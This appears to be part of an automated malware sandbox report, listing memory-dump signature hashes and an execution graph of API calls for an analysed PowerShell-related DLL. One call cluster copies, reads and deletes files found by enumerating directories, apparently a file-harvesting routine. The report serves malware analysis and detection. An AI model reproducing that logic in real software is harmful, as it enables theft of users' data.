                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$d%q$d%q$d%q$tPq$$q
                                                                                          • API String ID: 0-2531934922
                                                                                          • Opcode ID: 0c041739a45e04ecfbc9e2a8769eda5dd504c6d79dc9ba54bfc7ecd9f2d6f9e9
                                                                                          • Instruction ID: 7eb9434dccffa6f4d292193cd730d80128d79946b968bfaef72313739727b793
                                                                                          • Opcode Fuzzy Hash: 0c041739a45e04ecfbc9e2a8769eda5dd504c6d79dc9ba54bfc7ecd9f2d6f9e9
                                                                                          • Instruction Fuzzy Hash: 1851E2F2B143069FCB24CF24DD50BAAB7B2AFC5365F188096E8259B691D731DC81CB61
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$tPq$$q$$q$$q
                                                                                          • API String ID: 0-838716513
                                                                                          • Opcode ID: d199a98d0e23d81319bbcd76f89d625c559f21f357328d4dd130520fd16aa5c5
                                                                                          • Instruction ID: f1674e4659f553e6391bace86de78af6a969b529bbabed693b6b7fa8dea57283
                                                                                          • Opcode Fuzzy Hash: d199a98d0e23d81319bbcd76f89d625c559f21f357328d4dd130520fd16aa5c5
                                                                                          • Instruction Fuzzy Hash: 9761C1F170420ADFDB29CF14DD41BBA77B2AF95352F1880A6E8259B294C771DC81CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$d%q$d%q$d%q$tPq
                                                                                          • API String ID: 0-706544200
                                                                                          • Opcode ID: da72aa4a8a8b486c3adc37a0b7228130efc8eeee263cdefbe2f98238238fe4f4
                                                                                          • Instruction ID: 47cf4973db679c5c7d4afc8f3540ed153674165bd22a4edb062ab6eb3f738b68
                                                                                          • Opcode Fuzzy Hash: da72aa4a8a8b486c3adc37a0b7228130efc8eeee263cdefbe2f98238238fe4f4
                                                                                          • Instruction Fuzzy Hash: 5D31A1B4B00215DFDB24CF54D840AAAB7B2BF88715F188195E9566F350CB31DC42CB61
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (oq$(oq$(oq$(oq
                                                                                          • API String ID: 0-3853041632
                                                                                          • Opcode ID: bf7bea10e53913217b859efe99ce510d613dc06979cdf437055c65e0f8e662af
                                                                                          • Instruction ID: 5dbaddb32b66621037b33828db0a861f29c435a7066bdc98f5dbcc0fd8404990
                                                                                          • Opcode Fuzzy Hash: bf7bea10e53913217b859efe99ce510d613dc06979cdf437055c65e0f8e662af
                                                                                          • Instruction Fuzzy Hash: 24F106B1B08306DFDB158F65CC547AA7BBAEFC5221F1484ABE4658B291DB31C841CB71
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: XRq$XRq$tPq$$q
                                                                                          • API String ID: 0-1549039314
                                                                                          • Opcode ID: e9b65d806e53938ca969663b24ea629e62849de3e58b5be81ddccd021b3002c2
                                                                                          • Instruction ID: c65fed573ac2d47dce156534d5709ccdbf12bc3d0d82b0113e9f1896b78a121c
                                                                                          • Opcode Fuzzy Hash: e9b65d806e53938ca969663b24ea629e62849de3e58b5be81ddccd021b3002c2
                                                                                          • Instruction Fuzzy Hash: 0F4194B0A08206DFDB28CF19C945BA9B7F2AF85711F19C0E9E4246F250C731DD81CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $q$$q$$q$$q
                                                                                          • API String ID: 0-4102054182
                                                                                          • Opcode ID: a6eae7c95a2544198ffef63a015e40c9e6e2190b59b31d2ebd22ecd0bad5ee15
                                                                                          • Instruction ID: 2649d8be3dcc3cb0077ed25278b9e3895de146a616193bcf532352ef3f691d31
                                                                                          • Opcode Fuzzy Hash: a6eae7c95a2544198ffef63a015e40c9e6e2190b59b31d2ebd22ecd0bad5ee15
                                                                                          • Instruction Fuzzy Hash: 20216BB171031E5BEB34567ADC51B6BB7E6ABC1616F24802BE925CF381DD35C842C320
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$$q$$q
                                                                                          • API String ID: 0-3199993180
                                                                                          • Opcode ID: 23d05a2dc7f9e3268062c2bd2ad45a71df51770e67a297de3b9a47e8fc2fab57
                                                                                          • Instruction ID: e5f1fe11495e3435e5c783869023ee85dbc74dd699e1e1187b9f24934c1ceee4
                                                                                          • Opcode Fuzzy Hash: 23d05a2dc7f9e3268062c2bd2ad45a71df51770e67a297de3b9a47e8fc2fab57
                                                                                          • Instruction Fuzzy Hash: FC01F772B0D35B4FC33613A97C212A66FF15FC351031A41A7E051CF692D9198C0AC367

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.9%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:2.7%
                                                                                          Total number of Nodes:1659
                                                                                          Total number of Limit Nodes:1
                                                                                          execution_graph 6010 20903c90 RtlUnwind 6664 209036d0 6665 209036e2 6664->6665 6666 209036f0 @_EH4_CallFilterFunc@8 6664->6666 6667 20902ada _ValidateLocalCookies 5 API calls 6665->6667 6667->6666 7273 20905351 7274 20905360 7273->7274 7275 20905374 7273->7275 7274->7275 7277 2090571e _free 20 API calls 7274->7277 7276 2090571e _free 20 API calls 7275->7276 7278 20905386 7276->7278 7277->7275 7279 2090571e _free 20 API calls 7278->7279 7280 20905399 7279->7280 7281 2090571e _free 20 API calls 7280->7281 7282 209053aa 7281->7282 7283 2090571e _free 20 API calls 7282->7283 7284 209053bb 7283->7284 6668 209073d5 6669 209073e1 ___scrt_is_nonwritable_in_current_image 6668->6669 6680 20905671 RtlEnterCriticalSection 6669->6680 6671 209073e8 6681 20908be3 6671->6681 6673 209073f7 6674 20907406 6673->6674 6694 20907269 GetStartupInfoW 6673->6694 6705 20907422 6674->6705 6678 20907417 _abort 6680->6671 6682 20908bef ___scrt_is_nonwritable_in_current_image 6681->6682 6683 20908c13 6682->6683 6684 20908bfc 6682->6684 6708 20905671 RtlEnterCriticalSection 6683->6708 6686 20906368 _free 20 API calls 6684->6686 6687 20908c01 6686->6687 6688 209062ac _abort 26 API calls 6687->6688 6689 20908c0b _abort 6688->6689 6689->6673 6692 20908c1f 6693 20908c4b 6692->6693 6709 20908b34 6692->6709 6716 20908c72 6693->6716 6695 20907286 6694->6695 6697 20907318 6694->6697 6696 20908be3 27 API calls 6695->6696 6695->6697 6698 209072af 6696->6698 6700 2090731f 6697->6700 6698->6697 6699 209072dd GetFileType 6698->6699 6699->6698 6701 20907326 6700->6701 6702 20907369 GetStdHandle 6701->6702 6703 209073d1 6701->6703 6704 2090737c GetFileType 6701->6704 6702->6701 6703->6674 6704->6701 6720 209056b9 RtlLeaveCriticalSection 6705->6720 6707 20907429 6707->6678 6708->6692 6710 2090637b _abort 20 API calls 6709->6710 6712 20908b46 6710->6712 6711 20908b53 6713 2090571e _free 20 API calls 6711->6713 6712->6711 6714 20905eb7 11 API calls 6712->6714 6715 20908ba5 6713->6715 6714->6712 6715->6692 6719 209056b9 RtlLeaveCriticalSection 6716->6719 6718 20908c79 6718->6689 6719->6718 6720->6707 6721 20904ed7 6722 20906d60 51 API calls 6721->6722 6723 20904ee9 6722->6723 6732 20907153 GetEnvironmentStringsW 6723->6732 6726 20904ef4 6728 2090571e _free 20 API calls 6726->6728 6729 20904f29 6728->6729 6730 20904eff 6731 2090571e _free 20 API calls 6730->6731 6731->6726 6733 2090716a 6732->6733 6743 209071bd 6732->6743 6736 20907170 WideCharToMultiByte 6733->6736 6734 209071c6 FreeEnvironmentStringsW 6735 20904eee 6734->6735 6735->6726 6744 20904f2f 6735->6744 6737 2090718c 6736->6737 6736->6743 6738 209056d0 21 API calls 6737->6738 6739 20907192 6738->6739 6740 209071af 6739->6740 6741 20907199 WideCharToMultiByte 6739->6741 6742 2090571e _free 20 API calls 6740->6742 6741->6740 6742->6743 6743->6734 6743->6735 6745 20904f44 6744->6745 6746 2090637b _abort 20 API calls 6745->6746 6755 20904f6b 6746->6755 6747 20904fcf 6748 2090571e _free 20 API calls 6747->6748 6749 20904fe9 6748->6749 6749->6730 6750 2090637b _abort 20 API calls 6750->6755 6751 20904fd1 6752 20905000 20 API calls 6751->6752 6754 20904fd7 6752->6754 6757 2090571e _free 20 API calls 6754->6757 6755->6747 6755->6750 6755->6751 6756 20904ff3 6755->6756 6759 2090571e _free 20 API calls 6755->6759 6761 2090544d 6755->6761 6758 209062bc _abort 11 API calls 6756->6758 6757->6747 6760 20904fff 6758->6760 6759->6755 6762 20905468 6761->6762 6763 2090545a 6761->6763 6764 20906368 _free 20 API calls 6762->6764 6763->6762 6768 2090547f 6763->6768 6765 20905470 6764->6765 6766 209062ac _abort 26 API calls 6765->6766 6767 2090547a 6766->6767 6767->6755 6768->6767 6769 20906368 _free 20 API calls 6768->6769 6769->6765 7079 20902418 7081 20902420 ___scrt_release_startup_lock 7079->7081 7083 209047f5 7081->7083 7082 20902448 7084 20904804 7083->7084 7085 20904808 7083->7085 7084->7082 7088 20904815 7085->7088 7089 20905b7a _abort 20 API calls 7088->7089 7092 2090482c 7089->7092 7090 20902ada _ValidateLocalCookies 5 API calls 7091 20904811 7090->7091 7091->7082 7092->7090 6011 20904a9a 6014 20905411 6011->6014 6015 2090541d _abort 6014->6015 6020 20905af6 GetLastError 6015->6020 6019 20905422 6040 209055a8 6019->6040 6021 20905b12 6020->6021 6022 20905b0c 6020->6022 6024 2090637b _abort 20 API calls 6021->6024 6025 20905b61 SetLastError 6021->6025 6023 20905e08 _abort 11 API calls 6022->6023 6023->6021 6026 20905b24 6024->6026 6025->6019 6027 20905b2c 6026->6027 6028 20905e5e _abort 11 API calls 6026->6028 6029 2090571e _free 20 API calls 6027->6029 6030 20905b41 6028->6030 6031 20905b32 6029->6031 6030->6027 6032 20905b48 6030->6032 6034 20905b6d SetLastError 6031->6034 6033 2090593c _abort 20 API calls 6032->6033 6035 20905b53 6033->6035 6036 209055a8 _abort 35 API calls 6034->6036 6037 2090571e _free 20 API calls 6035->6037 6038 20905b79 6036->6038 6039 20905b5a 6037->6039 6039->6025 6039->6034 6051 20907613 6040->6051 6044 209055c2 IsProcessorFeaturePresent 6048 209055cd 6044->6048 6045 209055e0 6087 20904bc1 6045->6087 6047 209055b8 6047->6044 6047->6045 6081 209060e2 6048->6081 6090 20907581 6051->6090 6054 2090766e 6055 2090767a _abort 6054->6055 6056 20905b7a _abort 20 API calls 6055->6056 6060 209076a7 _abort 6055->6060 6063 209076a1 _abort 6055->6063 6056->6063 6057 209076f3 6059 20906368 _free 20 API calls 6057->6059 6058 209076d6 6116 2090bdc9 6058->6116 6061 209076f8 6059->6061 6067 2090771f 6060->6067 6107 20905671 RtlEnterCriticalSection 6060->6107 6104 209062ac 6061->6104 6063->6057 6063->6058 6063->6060 6068 2090777e 6067->6068 6074 20907776 6067->6074 6078 209077a9 6067->6078 6108 209056b9 RtlLeaveCriticalSection 6067->6108 6068->6078 6109 20907665 6068->6109 6071 20904bc1 _abort 28 API calls 6071->6068 6074->6071 6075 20905af6 _abort 38 API calls 6079 2090780c 6075->6079 6077 20907665 _abort 38 API calls 6077->6078 6112 2090782e 6078->6112 6079->6058 6080 20905af6 _abort 38 API calls 6079->6080 6080->6058 6082 209060fe ___scrt_fastfail 6081->6082 6083 2090612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6082->6083 6086 209061fb ___scrt_fastfail 6083->6086 6084 20902ada _ValidateLocalCookies 5 API calls 6085 20906219 6084->6085 6085->6045 6086->6084 6135 2090499b 6087->6135 6093 20907527 6090->6093 6092 209055ad 6092->6047 6092->6054 6094 20907533 ___scrt_is_nonwritable_in_current_image 6093->6094 6099 20905671 RtlEnterCriticalSection 6094->6099 6096 20907541 6100 20907575 6096->6100 6098 20907568 _abort 6098->6092 6099->6096 6103 209056b9 RtlLeaveCriticalSection 6100->6103 6102 2090757f 6102->6098 6103->6102 6119 20906231 6104->6119 6106 209062b8 6106->6058 6107->6067 6108->6074 6110 20905af6 _abort 38 API calls 6109->6110 6111 2090766a 6110->6111 6111->6077 6113 20907834 6112->6113 6114 209077fd 6112->6114 6134 209056b9 RtlLeaveCriticalSection 6113->6134 6114->6058 6114->6075 6114->6079 6117 20902ada _ValidateLocalCookies 5 API calls 6116->6117 6118 2090bdd4 6117->6118 6118->6118 6120 20905b7a _abort 20 API calls 6119->6120 6121 20906247 6120->6121 6122 20906255 6121->6122 6123 209062a6 6121->6123 6127 20902ada _ValidateLocalCookies 5 API calls 6122->6127 6130 209062bc IsProcessorFeaturePresent 6123->6130 6125 209062ab 6126 20906231 _abort 26 API calls 6125->6126 6128 209062b8 6126->6128 6129 2090627c 6127->6129 6128->6106 6129->6106 6131 209062c7 6130->6131 6132 209060e2 _abort 8 API calls 6131->6132 6133 209062dc GetCurrentProcess TerminateProcess 6132->6133 6133->6125 6134->6114 6136 209049a7 _abort 6135->6136 6137 209049bf 6136->6137 6157 20904af5 GetModuleHandleW 6136->6157 6166 20905671 RtlEnterCriticalSection 6137->6166 6141 20904a65 6174 20904aa5 6141->6174 6145 20904a3c 6148 20904a54 6145->6148 6170 20904669 6145->6170 6146 20904a82 6177 20904ab4 6146->6177 6147 20904aae 6152 2090bdc9 _abort 5 API calls 6147->6152 6154 20904669 _abort 5 API calls 6148->6154 6149 209049c7 6149->6141 6149->6145 6167 2090527a 6149->6167 6156 20904ab3 6152->6156 6154->6141 6158 209049b3 6157->6158 6158->6137 6159 20904b39 GetModuleHandleExW 6158->6159 6160 20904b63 GetProcAddress 6159->6160 6161 20904b78 6159->6161 6160->6161 6162 20904b95 6161->6162 6163 20904b8c FreeLibrary 6161->6163 6164 20902ada _ValidateLocalCookies 5 API calls 6162->6164 6163->6162 6165 20904b9f 6164->6165 6165->6137 6166->6149 6185 20905132 6167->6185 6171 20904698 6170->6171 6172 20902ada _ValidateLocalCookies 5 API calls 6171->6172 6173 209046c1 6172->6173 6173->6148 6207 209056b9 RtlLeaveCriticalSection 6174->6207 6176 20904a7e 6176->6146 6176->6147 6208 20906025 6177->6208 6180 20904ae2 6183 20904b39 _abort 8 API calls 6180->6183 6181 20904ac2 GetPEB 6181->6180 6182 20904ad2 GetCurrentProcess TerminateProcess 6181->6182 6182->6180 6184 20904aea ExitProcess 6183->6184 6188 209050e1 6185->6188 6187 20905156 6187->6145 6189 209050ed ___scrt_is_nonwritable_in_current_image 6188->6189 6196 20905671 RtlEnterCriticalSection 6189->6196 6191 209050fb 6197 2090515a 6191->6197 6195 20905119 _abort 6195->6187 6196->6191 6198 20905182 6197->6198 6199 2090517a 6197->6199 6198->6199 6202 2090571e _free 20 API calls 6198->6202 6200 20902ada _ValidateLocalCookies 5 API calls 6199->6200 6201 20905108 6200->6201 6203 20905126 6201->6203 6202->6199 6206 209056b9 RtlLeaveCriticalSection 6203->6206 6205 20905130 6205->6195 6206->6205 6207->6176 6209 2090604a 6208->6209 6211 20906040 6208->6211 6210 20905c45 _abort 5 API calls 6209->6210 6210->6211 6212 20902ada _ValidateLocalCookies 5 API calls 6211->6212 6213 20904abe 6212->6213 6213->6180 6213->6181 5784 20901c5b 5785 20901c6b ___scrt_fastfail 5784->5785 5788 209012ee 5785->5788 5787 20901c87 5789 20901324 ___scrt_fastfail 5788->5789 5790 209013b7 GetEnvironmentVariableW 5789->5790 5814 209010f1 5790->5814 5793 209010f1 57 API calls 5794 20901465 5793->5794 5795 209010f1 57 API calls 5794->5795 5796 20901479 5795->5796 5797 209010f1 57 API calls 5796->5797 5798 2090148d 5797->5798 5799 209010f1 57 API calls 5798->5799 5800 209014a1 5799->5800 5801 209010f1 57 API calls 5800->5801 5802 209014b5 lstrlenW 5801->5802 5803 209014d2 5802->5803 5804 209014d9 lstrlenW 5802->5804 5803->5787 5805 209010f1 57 API calls 5804->5805 5806 20901501 lstrlenW lstrcatW 5805->5806 5807 209010f1 57 API calls 5806->5807 5808 20901539 lstrlenW lstrcatW 5807->5808 5809 209010f1 57 API calls 5808->5809 5810 2090156b lstrlenW lstrcatW 5809->5810 5811 209010f1 57 API calls 5810->5811 5812 2090159d lstrlenW lstrcatW 5811->5812 5813 209010f1 57 API calls 5812->5813 5813->5803 5815 20901118 ___scrt_fastfail 5814->5815 5816 20901129 lstrlenW 5815->5816 5827 20902c40 5816->5827 5818 20901148 lstrcatW lstrlenW 5819 20901177 lstrlenW FindFirstFileW 5818->5819 5820 20901168 lstrlenW 5818->5820 5821 209011a0 5819->5821 5822 209011e1 5819->5822 5820->5819 5823 209011c7 FindNextFileW 5821->5823 5824 209011aa 5821->5824 5822->5793 5823->5821 5826 209011da FindClose 5823->5826 5824->5823 5829 20901000 5824->5829 5826->5822 5828 20902c57 5827->5828 5828->5818 5828->5828 5830 20901022 ___scrt_fastfail 5829->5830 5831 209010af 5830->5831 5832 2090102f lstrcatW lstrlenW 5830->5832 5835 209010b5 lstrlenW 5831->5835 5845 209010ad 5831->5845 5833 2090105a lstrlenW 5832->5833 5834 2090106b lstrlenW 5832->5834 5833->5834 5846 20901e89 lstrlenW 5834->5846 5860 20901e16 5835->5860 5838 20901088 GetFileAttributesW 5840 2090109c 5838->5840 5838->5845 5839 209010ca 5841 20901e89 5 API calls 5839->5841 5839->5845 5840->5845 5852 2090173a 5840->5852 5842 209010df 5841->5842 5865 209011ea 5842->5865 5845->5824 5847 20902c40 ___scrt_fastfail 5846->5847 5848 20901ea7 lstrcatW lstrlenW 5847->5848 5849 20901ed1 lstrcatW 5848->5849 5850 20901ec2 5848->5850 5849->5838 5850->5849 5851 20901ec7 lstrlenW 5850->5851 5851->5849 5853 20901747 ___scrt_fastfail 5852->5853 5880 20901cca 5853->5880 5856 2090199f 5856->5845 5858 20901824 ___scrt_fastfail _strlen 5858->5856 5900 209015da 5858->5900 5861 20901e29 5860->5861 5864 20901e4c 5860->5864 5862 20901e2d lstrlenW 5861->5862 5861->5864 5863 20901e3f lstrlenW 5862->5863 5862->5864 5863->5864 5864->5839 5866 2090120e ___scrt_fastfail 5865->5866 5867 20901e89 5 API calls 5866->5867 5868 20901220 GetFileAttributesW 5867->5868 5869 20901235 5868->5869 5870 20901246 5868->5870 5869->5870 5872 2090173a 35 API calls 5869->5872 5871 20901e89 5 API calls 5870->5871 5873 20901258 5871->5873 5872->5870 5874 209010f1 56 API calls 5873->5874 5875 2090126d 5874->5875 5876 20901e89 5 API calls 5875->5876 5877 2090127f ___scrt_fastfail 5876->5877 5878 209010f1 56 API calls 5877->5878 5879 209012e6 5878->5879 5879->5845 5881 20901cf1 ___scrt_fastfail 5880->5881 5882 20901d0f CopyFileW CreateFileW 5881->5882 5883 20901d44 DeleteFileW 5882->5883 5884 20901d55 GetFileSize 5882->5884 5889 20901808 5883->5889 5885 20901ede 22 API calls 5884->5885 5886 20901d66 ReadFile 5885->5886 5887 20901d94 CloseHandle DeleteFileW 5886->5887 5888 20901d7d CloseHandle DeleteFileW 5886->5888 5887->5889 5888->5889 5889->5856 5890 20901ede 5889->5890 5892 2090222f 5890->5892 5893 2090224e 5892->5893 5896 20902250 5892->5896 5908 2090474f 5892->5908 5913 209047e5 5892->5913 5893->5858 5895 20902908 5897 209035d2 __CxxThrowException@8 RaiseException 5895->5897 5896->5895 5920 209035d2 5896->5920 5898 20902925 5897->5898 5898->5858 5901 2090160c _strcat _strlen 5900->5901 5902 2090163c lstrlenW 5901->5902 6008 20901c9d 5902->6008 5904 20901655 lstrcatW lstrlenW 5905 20901678 5904->5905 5906 20901693 ___scrt_fastfail 5905->5906 5907 2090167e lstrcatW 5905->5907 5906->5858 5907->5906 5923 20904793 5908->5923 5911 2090478f 5911->5892 5912 20904765 5929 20902ada 5912->5929 5918 209056d0 _abort 5913->5918 5914 2090570e 5942 20906368 5914->5942 5916 209056f9 RtlAllocateHeap 5917 2090570c 5916->5917 5916->5918 5917->5892 5918->5914 5918->5916 5919 2090474f _abort 7 API calls 5918->5919 5919->5918 5922 209035f2 RaiseException 5920->5922 5922->5895 5924 2090479f ___scrt_is_nonwritable_in_current_image 5923->5924 5936 20905671 RtlEnterCriticalSection 5924->5936 5926 209047aa 5937 209047dc 5926->5937 5928 209047d1 _abort 5928->5912 5930 20902ae3 5929->5930 5931 20902ae5 IsProcessorFeaturePresent 5929->5931 5930->5911 5933 20902b58 5931->5933 5941 20902b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5933->5941 5935 20902c3b 5935->5911 5936->5926 5940 209056b9 RtlLeaveCriticalSection 5937->5940 5939 209047e3 5939->5928 5940->5939 5941->5935 5945 20905b7a GetLastError 5942->5945 5946 20905b93 5945->5946 5947 20905b99 5945->5947 5964 20905e08 5946->5964 5951 20905bf0 SetLastError 5947->5951 5971 2090637b 5947->5971 5953 20905bf9 5951->5953 5952 20905bb3 5978 2090571e 5952->5978 5953->5917 5957 20905bcf 5991 2090593c 5957->5991 5958 20905bb9 5960 20905be7 SetLastError 5958->5960 5960->5953 5962 2090571e _free 17 API calls 5963 20905be0 5962->5963 5963->5951 5963->5960 5996 20905c45 5964->5996 5966 20905e2f 5967 20905e47 TlsGetValue 5966->5967 5968 20905e3b 5966->5968 5967->5968 5969 20902ada _ValidateLocalCookies 5 API calls 5968->5969 5970 20905e58 5969->5970 5970->5947 5976 20906388 _abort 5971->5976 5972 209063c8 5975 20906368 _free 19 API calls 5972->5975 5973 209063b3 RtlAllocateHeap 5974 20905bab 5973->5974 5973->5976 5974->5952 5984 20905e5e 5974->5984 5975->5974 5976->5972 5976->5973 5977 2090474f _abort 7 API calls 5976->5977 5977->5976 5979 20905729 HeapFree 5978->5979 5983 20905752 _free 5978->5983 5980 2090573e 5979->5980 5979->5983 5981 20906368 _free 18 API calls 5980->5981 5982 20905744 GetLastError 5981->5982 5982->5983 5983->5958 5985 20905c45 _abort 5 API calls 5984->5985 5986 20905e85 5985->5986 5987 20905ea0 TlsSetValue 5986->5987 5988 20905e94 5986->5988 5987->5988 5989 20902ada _ValidateLocalCookies 5 API calls 5988->5989 5990 20905bc8 5989->5990 5990->5952 5990->5957 6002 20905914 5991->6002 5999 20905c71 5996->5999 6001 20905c75 __crt_fast_encode_pointer 5996->6001 5997 20905c95 6000 20905ca1 GetProcAddress 5997->6000 5997->6001 5998 20905ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5998->5999 5999->5997 5999->5998 5999->6001 6000->6001 6001->5966 6003 20905854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6002->6003 6004 20905938 6003->6004 6005 209058c4 6004->6005 6006 20905758 _abort 20 API calls 6005->6006 6007 209058e8 6006->6007 6007->5962 6009 20901ca6 _strlen 6008->6009 6009->5904 6770 209020db 6771 209020e7 ___scrt_is_nonwritable_in_current_image 6770->6771 6772 20902110 dllmain_raw 6771->6772 6777 2090210b 6771->6777 6782 209020f6 6771->6782 6773 2090212a 6772->6773 6772->6782 6783 20901eec 6773->6783 6775 20902177 6776 20901eec 31 API calls 6775->6776 6775->6782 6778 2090218a 6776->6778 6777->6775 6780 20901eec 31 API calls 6777->6780 6777->6782 6779 20902193 dllmain_raw 6778->6779 6778->6782 6779->6782 6781 2090216d dllmain_raw 6780->6781 6781->6775 6784 20901ef7 6783->6784 6785 20901f2a dllmain_crt_process_detach 6783->6785 6786 20901f1c dllmain_crt_process_attach 6784->6786 6787 20901efc 6784->6787 6788 20901f06 6785->6788 6786->6788 6789 20901f01 6787->6789 6790 20901f12 6787->6790 6788->6777 6789->6788 6793 2090240b 6789->6793 6798 209023ec 6790->6798 6806 209053e5 6793->6806 6917 20903513 6798->6917 6801 209023f5 6801->6788 6804 20902408 6804->6788 6805 2090351e 7 API calls 6805->6801 6812 20905aca 6806->6812 6809 2090351e 6888 20903820 6809->6888 6811 20902415 6811->6788 6813 20905ad4 6812->6813 6816 20902410 6812->6816 6814 20905e08 _abort 11 API calls 6813->6814 6815 20905adb 6814->6815 6815->6816 6817 20905e5e _abort 11 API calls 6815->6817 6816->6809 6818 20905aee 6817->6818 6820 209059b5 6818->6820 6821 209059c0 6820->6821 6822 209059d0 6820->6822 6826 209059d6 6821->6826 6822->6816 6825 2090571e _free 20 API calls 6825->6822 6827 209059ef 6826->6827 6828 209059e9 6826->6828 6830 2090571e _free 20 API calls 6827->6830 6829 2090571e _free 20 API calls 6828->6829 6829->6827 6831 209059fb 6830->6831 6832 2090571e _free 20 API calls 6831->6832 6833 20905a06 6832->6833 6834 2090571e _free 20 API calls 6833->6834 6835 20905a11 6834->6835 6836 2090571e _free 20 API calls 6835->6836 6837 20905a1c 6836->6837 6838 2090571e _free 20 API calls 6837->6838 6839 20905a27 6838->6839 6840 2090571e _free 20 API calls 6839->6840 6841 20905a32 6840->6841 6842 2090571e _free 20 API calls 6841->6842 6843 20905a3d 6842->6843 6844 2090571e _free 20 API calls 6843->6844 6845 20905a48 6844->6845 6846 2090571e _free 20 API calls 6845->6846 6847 20905a56 6846->6847 6852 2090589c 6847->6852 6858 209057a8 6852->6858 6854 209058c0 6855 209058ec 6854->6855 6871 20905809 6855->6871 6857 20905910 6857->6825 6859 209057b4 ___scrt_is_nonwritable_in_current_image 6858->6859 6866 20905671 RtlEnterCriticalSection 6859->6866 6861 209057be 6864 2090571e _free 20 API calls 6861->6864 6865 209057e8 6861->6865 6863 209057f5 _abort 6863->6854 6864->6865 6867 209057fd 6865->6867 6866->6861 6870 209056b9 RtlLeaveCriticalSection 6867->6870 6869 20905807 6869->6863 6870->6869 6872 20905815 ___scrt_is_nonwritable_in_current_image 6871->6872 6879 20905671 RtlEnterCriticalSection 6872->6879 6874 2090581f 6880 20905a7f 6874->6880 6876 20905832 6884 20905848 6876->6884 6878 20905840 _abort 6878->6857 6879->6874 6881 20905ab5 __fassign 6880->6881 6882 20905a8e __fassign 6880->6882 6881->6876 6882->6881 6883 20907cc2 __fassign 20 API calls 6882->6883 6883->6881 6887 209056b9 RtlLeaveCriticalSection 6884->6887 6886 20905852 6886->6878 6887->6886 6889 2090382d 6888->6889 6893 2090384b ___vcrt_freefls@4 6888->6893 6890 2090383b 6889->6890 6894 20903b67 6889->6894 6899 20903ba2 6890->6899 6893->6811 6904 20903a82 6894->6904 6896 20903b81 6897 20903b99 TlsGetValue 6896->6897 6898 20903b8d 6896->6898 6897->6898 6898->6890 6900 20903a82 try_get_function 5 API calls 6899->6900 6901 20903bbc 6900->6901 6902 20903bd7 TlsSetValue 6901->6902 6903 20903bcb 6901->6903 6902->6903 6903->6893 6905 20903aaa 6904->6905 6909 20903aa6 __crt_fast_encode_pointer 6904->6909 6905->6909 6910 209039be 6905->6910 6908 20903ac4 GetProcAddress 6908->6909 6909->6896 6911 209039cd try_get_first_available_module 6910->6911 6912 209039ea LoadLibraryExW 6911->6912 6914 20903a60 FreeLibrary 6911->6914 6915 20903a77 6911->6915 6916 20903a38 LoadLibraryExW 6911->6916 6912->6911 6913 20903a05 GetLastError 6912->6913 6913->6911 6914->6911 6915->6908 6915->6909 6916->6911 6923 20903856 6917->6923 6919 209023f1 6919->6801 6920 209053da 6919->6920 6921 20905b7a _abort 20 API calls 6920->6921 6922 209023fd 6921->6922 6922->6804 6922->6805 6924 20903862 GetLastError 6923->6924 6925 2090385f 6923->6925 6926 20903b67 ___vcrt_FlsGetValue 6 API calls 6924->6926 6925->6919 6927 20903877 6926->6927 6928 209038dc SetLastError 6927->6928 6929 20903ba2 ___vcrt_FlsSetValue 6 API calls 6927->6929 6934 20903896 6927->6934 6928->6919 6930 20903890 6929->6930 6931 209038b8 6930->6931 6932 20903ba2 ___vcrt_FlsSetValue 6 API calls 6930->6932 6930->6934 6933 20903ba2 ___vcrt_FlsSetValue 6 API calls 6931->6933 6931->6934 6932->6931 6933->6934 6934->6928 7093 2090281c 7096 20902882 7093->7096 7099 20903550 7096->7099 7098 2090282a 7100 2090358a 7099->7100 7101 2090355d 7099->7101 7100->7098 7101->7100 7102 209047e5 ___std_exception_copy 21 API calls 7101->7102 7103 2090357a 7102->7103 